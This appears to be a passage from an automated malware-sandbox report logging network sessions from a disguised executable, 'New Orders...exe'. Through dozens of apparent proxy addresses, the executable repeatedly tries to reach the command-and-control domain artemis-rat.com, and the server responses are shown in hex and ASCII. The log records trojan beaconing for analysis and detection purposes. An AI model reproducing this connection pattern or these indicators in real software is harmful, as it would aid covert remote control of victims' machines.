                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        751192.168.2.95216039.108.229.1480027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.693659067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.046345949 CET767INHTTP/1.1 403 Forbidden
                                                                                        Server: Beaver
                                                                                        Cache-Control: no-cache
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 635
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                        Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        752192.168.2.95213491.241.217.5890907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.693845987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        753192.168.2.952234212.110.188.213344117672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.696208954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.438057899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.372396946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.729660034 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        754192.168.2.95237723.225.72.12335017672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.697532892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.479716063 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        755192.168.2.952414104.16.109.143807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.697534084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.852269888 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        756192.168.2.952122185.132.242.21280837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.698081017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        757192.168.2.952415203.161.32.242610707672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.698973894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.273224115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.960841894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        758192.168.2.95225370.166.167.55577457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.699271917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        759192.168.2.952433104.16.221.57807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.700115919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.854556084 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        760192.168.2.95226372.195.34.60273917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.700140953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        761192.168.2.95226172.195.34.5941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.700659990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        762192.168.2.952255211.222.252.18781977672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.700851917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        763192.168.2.95205761.133.66.6990027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.790963888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.180403948 CET311INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        764192.168.2.952455172.67.181.20807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.791076899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.945432901 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        765192.168.2.95224361.129.2.21280807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.794352055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:13.110852003 CET726INHTTP/1.1 502 Bad Gateway
                                                                                        Server: nginx/1.20.1
                                                                                        Date: Mon, 11 Mar 2024 15:14:11 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 559
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        766192.168.2.952416192.163.200.93186467672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.796156883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.476167917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.070271015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.273585081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.668044090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.985241890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.273531914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.976483107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.163851976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        767192.168.2.95230672.210.221.19741457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.796258926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        768192.168.2.95223531.43.158.10888887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.796400070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        769192.168.2.952302121.128.194.154807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.796933889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        770192.168.2.95224945.138.87.23810807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.797499895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        771192.168.2.95257343.153.58.2044437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
